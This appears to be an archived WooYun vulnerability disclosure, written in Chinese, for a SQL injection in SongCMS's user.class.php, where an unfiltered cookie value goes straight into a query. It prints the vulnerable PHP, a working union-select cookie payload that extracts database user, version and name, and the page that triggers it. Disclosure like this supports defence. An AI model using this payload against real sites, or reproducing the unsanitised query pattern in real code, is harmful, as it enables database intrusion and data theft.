乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-11-29: 厂商已经主动忽略漏洞,细节向公众公开
全局变量$_COOKIE未经过滤带入SQL语句导致SQL注入
文件 ./class/user.class.php
public function member(){ global $_COOKIE,$Lang,$Warning; $Origin = $Lang == 1 ? './?flogin' : "./?flogin/l{$Lang}"; if(empty($_COOKIE['User']['Name']) || $_COOKIE['isLogin'] != 'songcms'){ MsgBox(1,$Warning[19],$Origin); } else { $SQL = "SELECT * FROM `{$this->dbprefix}user` WHERE `UserName` = '{$_COOKIE['User']['Name']}'"; //此处$_COOKIE['User']['Name']未过滤直接带入sql语句,满足else 条件即可造成注入 $result = $this->SelectSQL($SQL,1); if(count($result) == 1){ return array_shift($result); } elseif(UC_ENABLED == 1) { include_once($this->UC_dir.'uc_client/client.php'); list($uid,$username,$email) = uc_get_user($_COOKIE['User']['Name'],0); if($uid > 0){ $SQL = "INSERT INTO `{$this->dbprefix}user` (`UserName`,`UserEmail`,`UserLogin`,`UserLoginIP`,`UserLoginTime`,`UserRegIP`,`UserRegTime`,`UserAudit`)"; $SQL .= "VALUES ('{$username}','{$email}','0','" . $_SERVER['REMOTE_ADDR'] . "',NOW(),'" . $_SERVER['REMOTE_ADDR'] . "',NOW(),'{$this->Audit}');"; $oid = $this->ExecuteSQL($SQL,1); $SQL = "SELECT * FROM `{$this->dbprefix}user` WHERE `ID` = '{$oid}'"; $result = $this->SelectSQL($SQL,1); return array_shift($result); if(count($result) == 1){ return array_shift($result); } else { MsgBox(1,'Error:55140',$Origin); } } } else { MsgBox(1,$Warning[19],$Origin); } } }
本地构造 cookie 满足else条件12345678' and 1=2 union select 1,concat_ws('|',user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 limit 1#
然后访问 /songcms/?fprofile/m1
过滤参数!
未能联系到厂商或者厂商积极拒绝